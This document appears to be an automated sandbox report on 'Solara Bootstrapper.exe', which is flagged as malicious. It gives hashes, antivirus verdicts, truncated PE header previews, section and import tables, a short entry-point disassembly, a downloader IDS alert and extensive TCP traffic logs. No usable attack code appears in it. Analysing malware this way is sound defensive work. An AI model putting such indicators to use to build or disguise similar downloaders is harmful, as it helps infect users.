                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\Desktop\Solara Bootstrapper.exe
                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):10948608
                                                Entropy (8bit):6.9823288417626
                                                Encrypted:false
                                                SSDEEP:196608:p+lBkH0sN5KVaq4Jsbwd+mftM8y+uevftTJp3q73uGiCHz/u/dLTu:l0saVF4Js8d+F+53Ra3Tj41u
                                                MD5:D9D13FA25E880665FB471A4BE57C494C
                                                SHA1:7A4C1B09A9D37FF55872544A39A2CC5F0EEC9523
                                                SHA-256:632E973AB369D51E21B499E440BDD9C4B2FFAAC9E435485A648DE8724E1B19F7
                                                SHA-512:CF20F3C108865614A27D498EE74198EE151027423B518024155B1DFF553B33877AED81E7D5394094625D1EE7DA5DE82FA4ED119420009A3F3FC51019ADD3522E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 71%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................ ....@..........................@.......o..........................................P....0..................................................................................X............................text...h........................... ..`.rdata....... ......................@..@.bss......... ...........................rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Local\Temp\kx new.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):5471744
                                                Entropy (8bit):6.508687886623363
                                                Encrypted:false
                                                SSDEEP:98304:HV6FhnwA7hlMJ3J08U0bG31vxEuYH2vGDx+PqvqKjZ9+OE9GuqBfp:16HLXuC8U0KFvxEf9D1SOZuqh
                                                MD5:7D6398EBFB82A24748617189BF4AD691
                                                SHA1:6C96D0E343E1E84BF58670F1249C1694A2012F04
                                                SHA-256:D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
                                                SHA-512:9AEB3DA479B23880DE94E0B283A562CE19A79C2B27CB819DDF8E149ECA5673A42C659FFF10EA2EA9036AEDDA6FEF37B97ECBF37236DD22BAF20EBA1E6DDA4B4A
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d..._..f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text............................... ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                File Type:ASCII text, with CRLF, LF line terminators
                                                Category:dropped
                                                Size (bytes):1777
                                                Entropy (8bit):3.548832160380353
                                                Encrypted:false
                                                SSDEEP:24:AHq6saJQXQK6zkp5nFC3xtKEkyNodeI5nFC3udee:6s/Xv6zklC3aEky+de2C3udee
                                                MD5:6B22E6EF2B3890EABF2B786625B0194C
                                                SHA1:33B927413CB71314A4A6D4300793CFCDFF179477
                                                SHA-256:FE3EBD9F7FD8EC38410E0A064C6B8BAA2E67DB5F5EF9462380D4E7AFCF134DB6
                                                SHA-512:0C6E2F2D62EDAB4C25FE0680725A3BC2015FF9575385665B9D76FC3B7BDE8F4CB1664CD6C6EE35F63FBDFC39E4BE9FB75EBFFB8ED10F135B6C8D874F7E979388
                                                Malicious:false
                                                Preview: ,gg, .. i8""8i ,dPYb, .. `8,,8' IP'`Yb .. `88' I8 8I .. dP"8, I8 8' .. dP' `8a ,ggggg, I8 dP ,gggg,gg ,gggggg, ,gggg,gg .. dP' `Yb dP" "Y8gggI8dP dP" "Y8I dP""""8I dP" "Y8I .._ ,dP' I8 i8' ,8I I8P i8' ,8I ,8' 8I i8' ,8I .."888,,____,dP,d8, ,d8' ,d8b,_ ,d8, ,d8b,,dP Y8,,d8, ,d8b,..a8P"Y88888P" P"Y8888P" 8P'"Y88P"Y8888P"`Y88P `Y8P"Y8888P"`Y8.. .. .. .. ..
                                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                Entropy (8bit):7.001181834719954
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • VXD Driver (31/22) 0.00%
                                                File name:Solara Bootstrapper.exe
                                                File size:10'967'040 bytes
                                                MD5:00a1864355a5ea47902e5757c0d87fd9
                                                SHA1:4be5647308e0925fb00fae068cb4a89a8a449afc
                                                SHA256:4289002fd7528974ae7a9bf4d855bfd3812d248a46dbd7f94e7336f260ae7a39
                                                SHA512:7f86e42676cfd77aafd7a030656ad88d041ba54edc6eab41193528b03e79850f89e7d79679e6a14fff8e69d7011e36e03d09c73a46e8fc722dc126c3da4be718
                                                SSDEEP:196608:NaAEXnVB2t0vW54zu9cQ+6SLwC9tpg9FHh2C32cIPTv3O:NajFECvW5R9ccSLfYHhhbMv3
                                                TLSH:35B6231DD0DCAA8B82FB5338E827396BB56C4191071A9F27745B837B064CBD7D289F48
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................L...............p....@........................................................................
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x4014d1
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                DLL Characteristics:
                                                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:a9c887a4f18a3fede2cc29ceea138ed3
                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 00000008h
                                                nop
                                                mov eax, 00000004h
                                                push eax
                                                mov eax, 00000000h
                                                push eax
                                                lea eax, dword ptr [ebp-04h]
                                                push eax
                                                call 00007F9C84D431ADh
                                                add esp, 0Ch
                                                mov eax, 004014AFh
                                                push eax
                                                call 00007F9C84D431E7h
                                                mov eax, 00000001h
                                                push eax
                                                call 00007F9C84D431E4h
                                                add esp, 04h
                                                mov eax, 00030000h
                                                push eax
                                                mov eax, 00010000h
                                                push eax
                                                call 00007F9C84D431D8h
                                                add esp, 08h
                                                mov eax, dword ptr [00E76624h]
                                                mov ecx, dword ptr [00E76628h]
                                                mov edx, dword ptr [00E7662Ch]
                                                mov dword ptr [ebp-08h], eax
                                                lea eax, dword ptr [ebp-04h]
                                                push eax
                                                mov eax, dword ptr [00E77000h]
                                                push eax
                                                push edx
                                                push ecx
                                                mov eax, dword ptr [ebp-08h]
                                                push eax
                                                call 00007F9C84D431B2h
                                                add esp, 14h
                                                mov eax, dword ptr [00E76624h]
                                                mov ecx, dword ptr [00E76628h]
                                                mov edx, dword ptr [00E7662Ch]
                                                mov dword ptr [ebp-08h], eax
                                                mov eax, dword ptr [edx]
                                                push eax
                                                mov eax, dword ptr [ecx]
                                                push eax
                                                mov eax, dword ptr [ebp-08h]
                                                mov eax, dword ptr [eax]
                                                push eax
                                                call 00007F9C84D42F8Ch
                                                add esp, 0Ch
                                                push eax
                                                call 00007F9C84D43188h
                                                add esp, 04h
                                                leave
                                                ret
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 00000004h
                                                nop
                                                mov eax, dword ptr [00E76624h]
                                                mov ecx, dword ptr [ebp+08h]
                                                mov dword ptr [eax], ecx
                                                mov eax, dword ptr [00000000h]
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa765b00x50.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa780000x2f8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0xa766000x58.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x6680x8004c74066f77085e6570c9d09d54d43fcfFalse0.40673828125data4.589471170872518IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x20000xa747b30xa748006bcbd350d25bbdfeddfe9c8ec8409966unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .bss0xa770000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0xa780000x2f80x4008cb029179f4b7718540b784c3859b47eFalse0.353515625data4.268538415503129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_MANIFEST0xa780580x29bXML 1.0 document, ASCII textEnglishUnited States0.4707646176911544
                                                DLLImport
                                                msvcrt.dllmalloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                                shell32.dllShellExecuteA
                                                kernel32.dllSetUnhandledExceptionFilter
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2025-01-07T16:09:11.358836+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549706140.82.121.3443TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 7, 2025 16:09:08.109124899 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:08.109164953 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:08.109232903 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:08.121334076 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:08.121351957 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:08.771646023 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:08.771797895 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:08.775651932 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:08.775664091 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:08.776070118 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:08.876866102 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:08.923330069 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.236427069 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.236543894 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.236588955 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.236618042 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.236629009 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.236659050 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.237118006 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.237210035 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.237215996 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.237282991 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.237335920 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.237368107 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.237374067 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.237426043 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.237433910 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.303818941 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.321273088 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.327172041 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.327215910 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.327235937 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.327248096 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.327357054 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.327363014 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.327460051 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.327543974 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.327549934 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.327886105 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.327927113 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.327975988 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.328006983 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.328012943 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.328079939 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.328085899 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.328267097 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.328707933 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.328784943 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.328847885 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.328883886 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.328888893 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.328986883 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.329520941 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.329606056 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.329680920 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.329687119 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.329724073 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.329889059 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.329895020 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.406316996 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.406407118 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.406420946 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.412216902 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.412251949 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.412283897 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.412300110 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.412328959 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.412355900 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.418554068 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.418593884 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.418617964 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.418628931 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.418670893 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.418699026 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.418704987 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.418740988 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.418768883 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.418773890 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.418807983 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.418833971 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.418843985 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.418916941 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.419740915 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.419801950 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.419848919 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.419878960 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.419887066 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.419922113 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.419949055 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.419953108 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.419965982 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.420111895 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.420202971 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.420212030 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.420221090 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.420259953 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.420289040 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.420289993 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.420308113 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.420618057 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.421020985 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.421093941 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.421116114 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.421127081 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.421164036 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.421200991 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.421226025 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.421231985 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.421257019 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.421933889 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.421974897 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.422009945 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.422046900 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.422071934 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.422079086 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.422343969 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.422348976 CET44349704140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:09.427484989 CET49704443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:09.454504013 CET49705443192.168.2.5185.199.109.133
                                                Jan 7, 2025 16:09:09.454544067 CET44349705185.199.109.133192.168.2.5
                                                Jan 7, 2025 16:09:09.454636097 CET49705443192.168.2.5185.199.109.133
                                                Jan 7, 2025 16:09:09.454998016 CET49705443192.168.2.5185.199.109.133
                                                Jan 7, 2025 16:09:09.455014944 CET44349705185.199.109.133192.168.2.5
                                                Jan 7, 2025 16:09:09.925046921 CET44349705185.199.109.133192.168.2.5
                                                Jan 7, 2025 16:09:09.925144911 CET49705443192.168.2.5185.199.109.133
                                                Jan 7, 2025 16:09:09.929025888 CET49705443192.168.2.5185.199.109.133
                                                Jan 7, 2025 16:09:09.929040909 CET44349705185.199.109.133192.168.2.5
                                                Jan 7, 2025 16:09:09.929301977 CET44349705185.199.109.133192.168.2.5
                                                Jan 7, 2025 16:09:09.931894064 CET49705443192.168.2.5185.199.109.133
                                                Jan 7, 2025 16:09:09.979341030 CET44349705185.199.109.133192.168.2.5
                                                Jan 7, 2025 16:09:10.052758932 CET44349705185.199.109.133192.168.2.5
                                                Jan 7, 2025 16:09:10.052870989 CET44349705185.199.109.133192.168.2.5
                                                Jan 7, 2025 16:09:10.052939892 CET49705443192.168.2.5185.199.109.133
                                                Jan 7, 2025 16:09:10.053426027 CET49705443192.168.2.5185.199.109.133
                                                Jan 7, 2025 16:09:10.414700031 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:10.414752007 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:10.414840937 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:10.415663004 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:10.415677071 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.083296061 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.089555025 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.089590073 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.358840942 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.358922958 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.358969927 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.358980894 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.358992100 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.359019995 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.359103918 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.359168053 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.359174967 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.359206915 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.359261990 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.359266043 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.403033018 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.403106928 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.403119087 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.442605972 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.442687035 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.442696095 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.450503111 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.450535059 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.450570107 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.450582027 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.450593948 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.450648069 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.450788021 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.450956106 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.450959921 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.451183081 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.451232910 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.451241970 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.451602936 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.451631069 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.451658010 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.451663971 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.451668978 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.451702118 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.452125072 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.452158928 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.452174902 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.452179909 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.452217102 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.452220917 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.453001976 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.453039885 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.453066111 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.453072071 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.453164101 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.527318954 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.534861088 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.534904957 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.534930944 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.534931898 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.534943104 CET44349706140.82.121.3192.168.2.5
